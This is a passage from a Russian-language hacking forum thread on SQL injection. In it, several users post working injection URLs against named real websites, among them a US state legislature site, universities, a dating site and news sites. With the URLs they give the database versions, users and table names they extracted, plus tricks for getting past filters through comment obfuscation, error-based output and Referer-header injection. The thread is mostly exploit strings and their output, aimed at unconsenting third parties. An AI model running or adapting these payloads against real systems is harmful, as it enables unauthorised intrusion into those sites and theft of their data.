SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    other@localhost:5.0.45-log:sfors
     
  2. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    шоп

    Code:
    http://riddim.de/new.php?id=-348+union+select+1,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where+table_name%3E0x7461626C655F343030--
    Code:
    http://riddim.de/new.php?id=-348+union+select+1,2,3,4,database%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18--
    database: riddim
     
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    5.0.92-community:wwwlej_ro@localhost:wwwlej_db4
     
    _________________________
    #13823 winstrool, 3 May 2011
    Last edited: 3 May 2011
  4. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    http://www.datefinder.co.nz/member/user_profile.asp?user_id=-185%20UnIon+selECt+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+--+

    5.0.27-community
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    PR: 1
    5.0.91-log:cenat_db:[email protected]
     
    _________________________
  6. totenkopf

    totenkopf Elder - Старейшина

    Joined:
    19 Jul 2010
    Messages:
    92
    Likes Received:
    64
    Reputations:
    19
    Code:
    http://www.tisc.co.uk/print.php?pid=-51+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
    tisc@localhost:5.0.77:tisc

    Code:
    http://felixonline.co.uk/print.php?article=-900+UNION+SELECT+concat_ws(0x3a,user(),version(),database())+--+
    media_felix@localhost:5.0.90-log:media_felix

    Code:
    http://www.lccc.co.uk/print.php?p=news&id=-3313+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,user(),version(),database()),17,18,19,20,21,22,23,24,25,26,27,28+--+
    lccc-root@localhost:5.0.51b-log:lcccmain

    Code:
    http://www.inspire.org.uk/new/print.php?page=-135+UNION+ALL+SELECT+NULL,NULL,NULL,concat_ws(0x3a,user(),version(),database()),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+
    inspire_webuser@localhost:4.1.22-standard:inspire_webdbase

    Code:
    http://www.simplynetworking.es/advert_clicks.php?id=-416+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3b,0x3b,user(),version(),database()),8,9,10,11,12,13,14,15+--+
    simply@localhost;4.1.22;simply_networking

    Code:
    http://www.wilcocksassociates.co.uk/articles.php?id=-9258+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
    wilcock2_site@localhost:5.0.92-community:wilcock2_site
     
    1 person likes this.
  7. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.auhs.edu/mainpage.php?pageID=-13/**//*!union*//**//*!select*//**/user%28%29,2,3,4,5,6--+
     
    #13827 Cennarios, 4 May 2011
    Last edited: 18 Oct 2011
    2 people like this.
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    5.0.92-community:discount_commerce

    5.0.92-community:aaba_auct1@localhost:aaba_auct1

    // по прозьбе трудящихся была убрана ;)

    5.0.91-log:[email protected]:simpleas_cma
     
    _________________________
    #13828 winstrool, 4 May 2011
    Last edited: 5 May 2011
    1 person likes this.
  9. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    www.clei.cl
    pr- 6

    http://www.clei.cl/cleiej/paper.php?id=32+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),Database(),User()),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+LIMIT+1,1--

    Database Version: 5.1.51-log
    Database name: clei
    User name: clei@localhost
     
    2 people like this.
  10. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    alphazone4.com :: PR - 3
    Эксплойт
    Code:
    http://www.alphazone4.com/m/store/US.php?cat=1+union+select+1,substring%28group_concat%28unhex%28hex%28table_name%29%29%29,250%29,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+
    5.0.77
    admin@localhost
    alphazone4
     
    1 person likes this.
  11. [RedSky]

    [RedSky] Banned

    Joined:
    4 May 2011
    Messages:
    10
    Likes Received:
    11
    Reputations:
    10
    Ситуация: пробельные символы попадают без юрлдекодирования в запрос + однострочным комментом запрос не отсечь.
    Решение(замена пробельного символа, вывод в ошибке и закрытие ковычки, вместо ее отсечения):
    Code:
    http://www.vw-axsel.ru/catalog/tiguan/'/**/and(1)IN(select/**/1/**/from(select/**/count(*),concat(version(),floor(rand(0)*2))from(information_schema.tables)group/**/by/**/2)a)and'
     
    #13831 [RedSky], 5 May 2011
    Last edited: 5 May 2011
    3 people like this.
  12. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    http://cakerysupplies.com/ : PR 4

    Тип БД:МS ACCESS
    Имя БД:cakery

    Эксплойт
    По ходу принтабельных столбцов не нашлось, крутить по типу блайнl не было смысла - БД как я понял служит только для обеспечения информацией о товарах, следовательно никаких паролей и юзеров там нет
     
    1 person likes this.
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    pr:5 тиц:350
    тиц:40
    infosfera@localhost:4.0.24_Debian-10sarge3-log:infosfera

    pr:5
    5.0.84:cagepris_user@localhost:cagepris_cms
     
    _________________________
    #13833 winstrool, 6 May 2011
    Last edited: 6 May 2011
    1 person likes this.
  14. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Законодательная Власть Штата Аризона

    http://www.az[ZZZ]leg.gov : PR 6

    Тип БД:Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    Имя БД:Status
    Имя пользователя БД:webuser

    Эксплойт
    Таблицы
     
    #13834 eclipse, 6 May 2011
    Last edited: 6 May 2011
    3 people like this.
  15. [RedSky]

    [RedSky] Banned

    Joined:
    4 May 2011
    Messages:
    10
    Likes Received:
    11
    Reputations:
    10
    Ситуация: вывод через двойной запрос
    Решение:
    Code:
    http://mindlessgaming.com/?page=match&action=view&match_id=1'and(0)union select " 1'and(0)union select 1,version(),3,4,5,user(),7,8,9,10,11,12,13,14-- -"-- -
     
    #13835 [RedSky], 7 May 2011
    Last edited: 7 May 2011
    4 people like this.
  16. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    Code:
    http://www.soundtrackcovers.ru/catalogue.php?id=671-999.9+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
    4.1.25

    Code:
    http://www.finances-pedagogie.fr/pages/publications.php?id=34-999.9+union+select+1,2,version(),4,5,6--
    4.0.27-max-log
    Pr 5

    Code:
    http://www.lavallart-associes.com/texte_publications.php?id=49-999.9+union+select+1,2,3,4,5,6,7,version()--
    5.1.41-3ubuntu12

    Code:
    http://www.avance-org.fr/publications/publications.php?idFamille=2-999.9+union+select+1,2,3,4,5,6,version()--
    5.0.32-Debian_7etch12-log
     
    #13836 bloodAngel, 7 May 2011
    Last edited: 7 May 2011
    1 person likes this.
  17. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Заметно, что на сайте присутствует гей - тематика....

    http://www.bayareareporter.org/news/article.php?sec=news&article=-5000+union+select+1,table_name,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7+from+information_schema.columns+where+column_name+like+%22%login%%22+limit+0,1--+
     
    2 people like this.
  18. [RedSky]

    [RedSky] Banned

    Joined:
    4 May 2011
    Messages:
    10
    Likes Received:
    11
    Reputations:
    10
    Ситуация: инъекция в рефере, в инсерт запросе, вывод в ошибке.
    Решение:
    Code:
    http://74auc.ru/index.php
    referer: asd')on duplicate key update a=(select 1 from(select name_const(version(),1),name_const(version(),1))a)-- -
    
     
  19. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    http://faraon.stfaraon.ru/site.php?id=30065+and+1=0+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=0x666172616f6e7374666172616f6e--
     
  20. Megwarez

    Megwarez Member

    Joined:
    7 May 2010
    Messages:
    33
    Likes Received:
    12
    Reputations:
    4
    edu

    Code:
    http://art.colorado.edu/hiaff/section.php?id=-4+union+select+1,2,3,4,group_concat%280x0b,table_name%29,6,7+from+information_schema.tables+--
    pr6

    Code:
    http://www.adas-fusion.eu/theme.php?id=-3+union+select+1,2,3,group_concat%280x0b,table_name%29,5,6+from+information_schema.tables+--
    pr5
     
    #13840 Megwarez, 10 May 2011
    Last edited: 10 May 2011
    1 person likes this.
Thread Status:
Not open for further replies.